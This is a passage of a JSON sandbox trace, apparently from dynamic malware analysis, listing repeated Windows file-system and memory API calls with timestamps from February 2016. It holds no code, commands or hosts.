"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,080", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,080", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,080", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,090", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,090", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,090", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,090", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,090", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,090", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,090", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,090", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,100", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,110", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,110", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,120", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,120", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,120", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,120", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,120", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,120", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,120", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,120", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,130", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,140", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,140", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,140", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,140", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,140", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,140", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,140", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,140", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,140", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,140", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,150", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,150", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,150", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,150", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,150", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,150", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,150", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,150", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,160", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,160", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,160", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,160", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,160", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,160", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,160", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,160", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,160", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,170", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,170", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,170", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,170", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,170", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,170", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,170", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,170", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,180", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,190", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,190", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,190", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,190", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,190", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,190", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,200", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,210", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,210", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,210", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,210", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,210", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,210", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,210", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,210", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,210", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,220", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,220", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,220", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,220", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,220", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,220", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,220", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,220", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,220", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,230", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,230", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,230", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,230", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,230", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,230", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,230", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,230", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,230", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,240", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,240", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,240", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,240", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,240", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,240", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,250", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,250", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,250", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,250", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,250", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,250", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,250", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,250", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,260", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,260", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,260", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,260", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,260", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,260", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,270", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,270", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,270", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,270", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,270", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,270", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,270", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,270", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,280", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,290", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,290", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,290", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,290", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,290", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,290", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,300", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,300", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,300", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,300", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,300", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,300", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,300", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,300", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,310", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,310", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,310", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,310", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,310", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,310", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,310", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,310", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,320", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,330", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,330", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,330", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,340", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,350", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,350", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,350", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,350", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,350", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,350", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,350", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,350", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,360", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,360", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,360", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,360", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,360", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,360", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,360", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,360", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,360", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,370", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,370", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,370", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,370", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,370", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,370", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,370", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,370", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,370", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,380", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,380", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,390", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,390", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,390", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,390", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,390", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,390", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,400", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,400", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,400", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,400", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,400", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,400", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,410", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,410", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,410", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,410", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,410", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,410", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,420", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,430", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,440", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,440", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,440", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,440", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,440", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,440", "api": "NtWriteFile"}, 